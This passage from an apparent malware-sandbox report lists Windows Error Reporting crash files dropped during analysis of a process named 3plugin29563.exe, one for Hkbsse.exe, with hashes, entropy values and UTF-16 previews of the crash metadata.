Size (bytes):	65536
Entropy (8bit):	1.1039049051241154
Encrypted:	false
SSDEEP:	384:xE3lz4onoizCJpxuj4azuiFmY4IO8Lsm:x8lzXoizCJpxuj9zuiFmY4IO8Ls
MD5:	EF10E03FD1C37EFDE6880483C2B47801
SHA1:	B424621C362F904C3486114315C10C10F24D9B5F
SHA-256:	F185AB2EAB807FC1E56B337C419B5AE697BAA962C8703741A8AF691B4F05E040
SHA-512:	49718FDB01F4A38B0F3CC44A98CD48F9370C01E4DAC10AEF8325E60E5A111CCEF3DF7D37E5E41A8D856FFC0A51D5082F7A126F87D0092651A878E1469159FB7A
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.9.2.3.4.7.4.7.2.6.7.4.1.7.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.9.2.3.4.7.4.8.1.7.3.6.6.4.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.5.5.4.6.f.1.e.-.f.d.a.7.-.4.b.3.3.-.a.9.7.9.-.9.3.5.8.7.c.2.7.1.2.4.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.5.7.1.0.a.f.3.-.c.2.2.d.-.4.1.7.8.-.9.b.c.d.-.b.c.8.c.4.0.f.7.b.9.b.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.3.p.l.u.g.i.n.2.9.5.6.3...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.d.9.4.-.0.0.0.1.-.0.0.1.5.-.3.9.d.3.-.5.0.4.7.7.b.f.8.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.6.4.0.7.e.2.e.2.6.9.8.3.6.9.9.1.0.1.4.f.a.1.e.c.b.8.b.6.5.6.d.0.0.0.0.f.f.f.f.!.0.0.0.0.8.5.6.e.9.6.8.8.e.3.e.0.8.7.4.8.9.d.6.d.4.e.f.0.2.b.7.3.1.7.d.3.c.b.c.1.f.f.f.7.!.3.p.l.u.g.i.n.2.9.5.6.3...e.x.e.....T.a.r.g.e.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_3plugin29563.exe_aed538d3da111a25df1621c29ce9435f71165_50c3897d_1ca7f69b-d1d9-4d09-a9a8-22c64161a46f\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8916707735173207
Encrypted:	false
SSDEEP:	384:gE3lz4enoK56rDxuj3zuiFmY4IO8Lsmp:g8lzRoK56rDxuj3zuiFmY4IO8Ls
MD5:	6790830B400B021FE3245258A205CC9D
SHA1:	0D5CFDB385F56342783527A584F94B66C28AB37A
SHA-256:	93869DAE127BEFD62B8E48498FDDDDDDC86D0CFC40F0968359788D106022BDBB
SHA-512:	BD7121ACEFB124C9F93A4F7939F93155440373F87174CD618551BD789D8CEBEDFAAD00198366CBC9672E7B9EDF1CB37956E4B1628698FDFE33F58D5307A9482A
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.9.2.3.4.7.4.0.5.3.8.0.4.1.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.c.a.7.f.6.9.b.-.d.1.d.9.-.4.d.0.9.-.a.9.a.8.-.2.2.c.6.4.1.6.1.a.4.6.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.4.7.8.8.7.8.3.-.d.5.5.e.-.4.d.8.1.-.a.7.f.0.-.c.d.9.2.3.d.0.8.3.d.3.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.3.p.l.u.g.i.n.2.9.5.6.3...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.d.9.4.-.0.0.0.1.-.0.0.1.5.-.3.9.d.3.-.5.0.4.7.7.b.f.8.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.6.4.0.7.e.2.e.2.6.9.8.3.6.9.9.1.0.1.4.f.a.1.e.c.b.8.b.6.5.6.d.0.0.0.0.f.f.f.f.!.0.0.0.0.8.5.6.e.9.6.8.8.e.3.e.0.8.7.4.8.9.d.6.d.4.e.f.0.2.b.7.3.1.7.d.3.c.b.c.1.f.f.f.7.!.3.p.l.u.g.i.n.2.9.5.6.3...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.8././.2.4.:.1.2.:.2.3.:.2.8.!.0.!.3.p.l.u.g.i.n.2.9.5.6.3...e.x.e.....B.o.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_3plugin29563.exe_aed538d3da111a25df1621c29ce9435f71165_50c3897d_78a1c072-59fe-4f95-a73d-5b4ad6421e45\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9995267112170246
Encrypted:	false
SSDEEP:	384:mE3lz4QOnoK56rDxuj5zuiFmY4IO8Lsm:m8lzEoK56rDxuj5zuiFmY4IO8Ls
MD5:	12CE31FDB34E8C35A31D1A49D21EE819
SHA1:	97D4456B3F308E966E5AE4651CC073A557AF6511
SHA-256:	14E08661681DF7BD7E408A5A3FD7F14E625C12F7B7950F37160EEA9E15C8CBF0
SHA-512:	2B07494C20D7A799DE8C545EFFF824CCCC965CCA010D3DDC5B9F4A615AFC2813A8B915B79A45E194E564BFFC7DE7D80990C699A48B4D0BA6E1C5E93786849722
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.9.2.3.4.7.4.5.3.7.7.9.4.6.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.8.a.1.c.0.7.2.-.5.9.f.e.-.4.f.9.5.-.a.7.3.d.-.5.b.4.a.d.6.4.2.1.e.4.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.0.0.1.4.6.6.a.-.8.b.4.5.-.4.a.e.a.-.a.e.5.8.-.6.b.a.5.3.d.e.c.d.a.3.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.3.p.l.u.g.i.n.2.9.5.6.3...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.d.9.4.-.0.0.0.1.-.0.0.1.5.-.3.9.d.3.-.5.0.4.7.7.b.f.8.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.6.4.0.7.e.2.e.2.6.9.8.3.6.9.9.1.0.1.4.f.a.1.e.c.b.8.b.6.5.6.d.0.0.0.0.f.f.f.f.!.0.0.0.0.8.5.6.e.9.6.8.8.e.3.e.0.8.7.4.8.9.d.6.d.4.e.f.0.2.b.7.3.1.7.d.3.c.b.c.1.f.f.f.7.!.3.p.l.u.g.i.n.2.9.5.6.3...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.8././.2.4.:.1.2.:.2.3.:.2.8.!.0.!.3.p.l.u.g.i.n.2.9.5.6.3...e.x.e.....B.o.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_3plugin29563.exe_aed538d3da111a25df1621c29ce9435f71165_50c3897d_793b0982-9c02-4be3-8727-374fe874914b\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9791374343692693
Encrypted:	false
SSDEEP:	384:41E3lz4WnoK56rDxujrzuiFmY4IO8Lsm:o8lzZoK56rDxujrzuiFmY4IO8Ls
MD5:	2DC755C41C03789F61D51159209D0B47
SHA1:	CC4F2AB7C43D6D706270E8D0BE3230D83225992D
SHA-256:	4072A75B9F8F283C915DD36766E2446F2DCBC507F2582D81714DB7DB97E0FF24
SHA-512:	979DCDBA5811ABF64DFCB47F83CFCC3221C7F9C891197163BF092CCA97E6E523A0A8B98855921E5647C7FB6FF293843FDA90BB21ED3722E44689EFFD22660469
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.9.2.3.4.7.4.3.7.1.4.5.3.3.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.9.3.b.0.9.8.2.-.9.c.0.2.-.4.b.e.3.-.8.7.2.7.-.3.7.4.f.e.8.7.4.9.1.4.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.9.6.5.2.7.8.f.-.b.7.2.1.-.4.d.0.a.-.8.1.1.2.-.b.b.0.5.6.e.e.4.6.e.8.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.3.p.l.u.g.i.n.2.9.5.6.3...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.d.9.4.-.0.0.0.1.-.0.0.1.5.-.3.9.d.3.-.5.0.4.7.7.b.f.8.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.6.4.0.7.e.2.e.2.6.9.8.3.6.9.9.1.0.1.4.f.a.1.e.c.b.8.b.6.5.6.d.0.0.0.0.f.f.f.f.!.0.0.0.0.8.5.6.e.9.6.8.8.e.3.e.0.8.7.4.8.9.d.6.d.4.e.f.0.2.b.7.3.1.7.d.3.c.b.c.1.f.f.f.7.!.3.p.l.u.g.i.n.2.9.5.6.3...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.8././.2.4.:.1.2.:.2.3.:.2.8.!.0.!.3.p.l.u.g.i.n.2.9.5.6.3...e.x.e.....B.o.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_3plugin29563.exe_aed538d3da111a25df1621c29ce9435f71165_50c3897d_7d8a3dd5-e412-4b8d-879d-666e77a1bbf9\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8665052876954212
Encrypted:	false
SSDEEP:	192:01E331R14FF1op056rB1j1ujs+qzuiFmZ24IO8J1q1m:iE3lz4FnoK56rDxujAzuiFmY4IO8Lsm
MD5:	04287E23AC1ECD24421FDC945D781AE2
SHA1:	BD84F1F0FE8C39BFC105E7F312E54E92921A1803
SHA-256:	409A012D528D8591DF8FE10C0949954FF46F5DBCE7E1C2556EDCFD80743095E2
SHA-512:	79B069F6C251CACBB9D2E8E39415B11F2C7DE4E7853142990791B83199981C5650261C9BC05A60E36291BB512D217C5376249484BE38388C3AD7FCF6CDCFD67A
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.9.2.3.4.7.3.9.2.5.8.0.2.6.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.d.8.a.3.d.d.5.-.e.4.1.2.-.4.b.8.d.-.8.7.9.d.-.6.6.6.e.7.7.a.1.b.b.f.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.6.c.e.5.5.1.c.-.4.7.f.6.-.4.6.1.2.-.9.5.b.f.-.7.2.4.c.4.7.d.d.6.b.d.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.3.p.l.u.g.i.n.2.9.5.6.3...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.d.9.4.-.0.0.0.1.-.0.0.1.5.-.3.9.d.3.-.5.0.4.7.7.b.f.8.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.6.4.0.7.e.2.e.2.6.9.8.3.6.9.9.1.0.1.4.f.a.1.e.c.b.8.b.6.5.6.d.0.0.0.0.f.f.f.f.!.0.0.0.0.8.5.6.e.9.6.8.8.e.3.e.0.8.7.4.8.9.d.6.d.4.e.f.0.2.b.7.3.1.7.d.3.c.b.c.1.f.f.f.7.!.3.p.l.u.g.i.n.2.9.5.6.3...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.8././.2.4.:.1.2.:.2.3.:.2.8.!.0.!.3.p.l.u.g.i.n.2.9.5.6.3...e.x.e.....B.o.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_3plugin29563.exe_aed538d3da111a25df1621c29ce9435f71165_50c3897d_a5e85787-b950-4f2a-8812-eb73aedca52f\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8981945285642023
Encrypted:	false
SSDEEP:	192:A1E331R14dF1op056rB1j1ujs+nZrGzuiFmZ24IO8J1q1m:uE3lz4dnoK56rDxujWzuiFmY4IO8Lsm
MD5:	11A9D28F28F92A9E0208B92C35BD8B0A
SHA1:	E0B6F48CEB7614EDBA8F3471D82A83409622326E
SHA-256:	B198E7ECBACBD44BB06622B038A8008A541E405445D1AE4B2F59A7EC171AEF9D
SHA-512:	D8D3BC890E76EE9D70E6674EBD16F5D9804859C42D10DE352E900D86888019DDCB13FDD057B6C63BE70E8D0829226CD7A97BA70EA270D8CCB686DAF5665916B3
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.9.2.3.4.7.4.1.7.6.4.0.1.7.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.5.e.8.5.7.8.7.-.b.9.5.0.-.4.f.2.a.-.8.8.1.2.-.e.b.7.3.a.e.d.c.a.5.2.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.6.4.1.0.0.a.b.-.e.3.4.2.-.4.e.3.5.-.8.1.d.e.-.2.3.7.4.e.9.f.9.a.0.5.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.3.p.l.u.g.i.n.2.9.5.6.3...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.d.9.4.-.0.0.0.1.-.0.0.1.5.-.3.9.d.3.-.5.0.4.7.7.b.f.8.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.6.4.0.7.e.2.e.2.6.9.8.3.6.9.9.1.0.1.4.f.a.1.e.c.b.8.b.6.5.6.d.0.0.0.0.f.f.f.f.!.0.0.0.0.8.5.6.e.9.6.8.8.e.3.e.0.8.7.4.8.9.d.6.d.4.e.f.0.2.b.7.3.1.7.d.3.c.b.c.1.f.f.f.7.!.3.p.l.u.g.i.n.2.9.5.6.3...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.8././.2.4.:.1.2.:.2.3.:.2.8.!.0.!.3.p.l.u.g.i.n.2.9.5.6.3...e.x.e.....B.o.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_3plugin29563.exe_aed538d3da111a25df1621c29ce9435f71165_50c3897d_a7b1fa16-4ca5-41de-a8c2-a5607192858e\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8329924425429751
Encrypted:	false
SSDEEP:	192:fB1E331R14FF1op056rB1j1ujshzuiFmZ24IO8J1q1m:7E3lz4FnoK56rDxujCzuiFmY4IO8Lsm
MD5:	282D82D4CF215F8542BBF107A2FF3B2B
SHA1:	A763E12A1609BF4B9AB22A648EA24CADAF816526
SHA-256:	9B57F513F8919D22B90558728ECE47D5E393DC1E1517460C93666F07DFDC96ED
SHA-512:	E0EC360DFDCEC049C141C06942D04ED7BC11F5DE53F7D04730DB4C679DEFA60AAC447070DB90B3E9172F5D807A2F2E18735780B52A3867672AD9423FBF34908E
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.9.2.3.4.7.3.8.5.1.2.7.1.9.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.7.b.1.f.a.1.6.-.4.c.a.5.-.4.1.d.e.-.a.8.c.2.-.a.5.6.0.7.1.9.2.8.5.8.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.e.3.6.9.6.5.6.-.0.8.0.8.-.4.c.1.f.-.9.5.7.0.-.2.4.2.4.4.6.a.4.0.e.0.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.3.p.l.u.g.i.n.2.9.5.6.3...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.d.9.4.-.0.0.0.1.-.0.0.1.5.-.3.9.d.3.-.5.0.4.7.7.b.f.8.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.6.4.0.7.e.2.e.2.6.9.8.3.6.9.9.1.0.1.4.f.a.1.e.c.b.8.b.6.5.6.d.0.0.0.0.f.f.f.f.!.0.0.0.0.8.5.6.e.9.6.8.8.e.3.e.0.8.7.4.8.9.d.6.d.4.e.f.0.2.b.7.3.1.7.d.3.c.b.c.1.f.f.f.7.!.3.p.l.u.g.i.n.2.9.5.6.3...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.8././.2.4.:.1.2.:.2.3.:.2.8.!.0.!.3.p.l.u.g.i.n.2.9.5.6.3...e.x.e.....B.o.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_3plugin29563.exe_aed538d3da111a25df1621c29ce9435f71165_50c3897d_c2412d70-be80-4c20-babe-885fc4666691\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8919483918813116
Encrypted:	false
SSDEEP:	384:WJE3lz47noK56rDxuj3zuiFmY4IO8Lsm:W8lz6oK56rDxuj3zuiFmY4IO8Ls
MD5:	A163CDBF7C6837196EED7FC82A1F210F
SHA1:	30F276B0E3363FB68A1CA7F1CD31F1C3AD0432B9
SHA-256:	8B40C69FB6CC6C57A86E5FEAF71D4586E591A884453F96EA7C8AB9E79270D34C
SHA-512:	E73B54B68ABF184552E08E6279DD69B410B20742EEFB35D2F500E8B2F76B9E4B70078DA32CA58D225CB193090B6417981D963E0D2540FC24FB0416B603CA7601
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.9.2.3.4.7.4.1.1.1.2.2.8.5.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.2.4.1.2.d.7.0.-.b.e.8.0.-.4.c.2.0.-.b.a.b.e.-.8.8.5.f.c.4.6.6.6.6.9.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.a.2.d.c.b.c.5.-.2.4.4.9.-.4.6.a.0.-.8.d.8.e.-.1.4.6.8.a.6.e.d.d.b.d.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.3.p.l.u.g.i.n.2.9.5.6.3...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.d.9.4.-.0.0.0.1.-.0.0.1.5.-.3.9.d.3.-.5.0.4.7.7.b.f.8.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.6.4.0.7.e.2.e.2.6.9.8.3.6.9.9.1.0.1.4.f.a.1.e.c.b.8.b.6.5.6.d.0.0.0.0.f.f.f.f.!.0.0.0.0.8.5.6.e.9.6.8.8.e.3.e.0.8.7.4.8.9.d.6.d.4.e.f.0.2.b.7.3.1.7.d.3.c.b.c.1.f.f.f.7.!.3.p.l.u.g.i.n.2.9.5.6.3...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.8././.2.4.:.1.2.:.2.3.:.2.8.!.0.!.3.p.l.u.g.i.n.2.9.5.6.3...e.x.e.....B.o.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_3plugin29563.exe_aed538d3da111a25df1621c29ce9435f71165_50c3897d_edc5663c-07c9-4714-988c-ab0a0ffabbfe\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9998143808803986
Encrypted:	false
SSDEEP:	384:IBE3lz4XnoK56rDxuj5zuiFmY4IO8Lsm:IB8lzWoK56rDxuj5zuiFmY4IO8Ls
MD5:	697B35ACD8DB43CA02748365B98A9766
SHA1:	6EF93384F1E1E5EFFE3FE7513732E6F3B611ACF1
SHA-256:	FAA0F61CBC7F8B031760B1527DAFFD81D2B2BFB31FE46DB65B26853C760253C4
SHA-512:	EDCACB12C8E3B5866F1B3DF69F34C40FFC1B58C1CC69D0B6508DF887129A131323193DD077177D8B0292D575EABBA550350BAFFF4616C3B0F196EFD01CE95D2E
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.9.2.3.4.7.4.4.3.7.6.7.4.4.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.d.c.5.6.6.3.c.-.0.7.c.9.-.4.7.1.4.-.9.8.8.c.-.a.b.0.a.0.f.f.a.b.b.f.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.2.d.7.1.1.5.2.-.b.9.7.7.-.4.0.e.0.-.b.3.8.7.-.a.4.1.8.2.9.e.b.f.e.3.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.3.p.l.u.g.i.n.2.9.5.6.3...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.d.9.4.-.0.0.0.1.-.0.0.1.5.-.3.9.d.3.-.5.0.4.7.7.b.f.8.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.6.4.0.7.e.2.e.2.6.9.8.3.6.9.9.1.0.1.4.f.a.1.e.c.b.8.b.6.5.6.d.0.0.0.0.f.f.f.f.!.0.0.0.0.8.5.6.e.9.6.8.8.e.3.e.0.8.7.4.8.9.d.6.d.4.e.f.0.2.b.7.3.1.7.d.3.c.b.c.1.f.f.f.7.!.3.p.l.u.g.i.n.2.9.5.6.3...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.8././.2.4.:.1.2.:.2.3.:.2.8.!.0.!.3.p.l.u.g.i.n.2.9.5.6.3...e.x.e.....B.o.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_3plugin29563.exe_aed538d3da111a25df1621c29ce9435f71165_50c3897d_f4576c93-dc97-4cb8-964e-4b6f7cec5a13\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9078088233822058
Encrypted:	false
SSDEEP:	384:5XE3lz4GnoK56rDxujDzuiFmY4IO8Lsm:5X8lz5oK56rDxujDzuiFmY4IO8Ls
MD5:	35CB2B35D3A37324E4530C1BF7A86130
SHA1:	52602B6F2E9AD59F406B41CF4E495A815F77F150
SHA-256:	ACB901F0E789C2EF199A606E98F4453648D3AF63C7A87338CB375F50A737C359
SHA-512:	1C2FC37C6D6A7FE4292BBEA218B1E9ABD44B3EB56448FC7EF093DE32BED3A2019C05BA14762E7E2FB81AB0A5D468CD2C04C59D4558145A300AAB09A40DA47D9F
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.9.2.3.4.7.4.2.9.6.4.6.3.0.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.4.5.7.6.c.9.3.-.d.c.9.7.-.4.c.b.8.-.9.6.4.e.-.4.b.6.f.7.c.e.c.5.a.1.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.2.a.c.a.2.e.3.-.d.6.a.6.-.4.0.4.4.-.9.a.c.1.-.e.1.1.0.5.4.b.9.0.0.a.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.3.p.l.u.g.i.n.2.9.5.6.3...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.d.9.4.-.0.0.0.1.-.0.0.1.5.-.3.9.d.3.-.5.0.4.7.7.b.f.8.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.6.4.0.7.e.2.e.2.6.9.8.3.6.9.9.1.0.1.4.f.a.1.e.c.b.8.b.6.5.6.d.0.0.0.0.f.f.f.f.!.0.0.0.0.8.5.6.e.9.6.8.8.e.3.e.0.8.7.4.8.9.d.6.d.4.e.f.0.2.b.7.3.1.7.d.3.c.b.c.1.f.f.f.7.!.3.p.l.u.g.i.n.2.9.5.6.3...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.8././.2.4.:.1.2.:.2.3.:.2.8.!.0.!.3.p.l.u.g.i.n.2.9.5.6.3...e.x.e.....B.o.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Hkbsse.exe_eba6997ab32646c7c7813d2fb9eb324dd536044_37dd4795_00157438-aa38-4f1f-8622-7ba3dfdcca08\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8358932496499377
Encrypted:	false
SSDEEP:	96:9z3ZsJhqSoA7Jf7QXIDcQnc6rCcEhcw3rj5x+HbHg/wWGTf3hOycoqzIPEVsPiD+:Z3Z/p056rgjsnzuiFLZ24IO82Q
MD5:	EFEC131B22E9F0E7576265326B67ECFE
SHA1:	6EAD94F3C438A549A7D3A03AEC4A8D900E7286AF
SHA-256:	A18A8661B23690265066C2C75BB278B7A08C5601BEEEC572DC245F2CCA8CA9EB
SHA-512:	A2230EC4BB54E5B53BD90103902758E37AE1F9F5F41A5525E85D1ECDB93BD02E8591ECCF1BA9BFA43F86D1D0E223E677FF5BAC6CA21B5B13A5F53D948E24EDE8
Malicious:	false
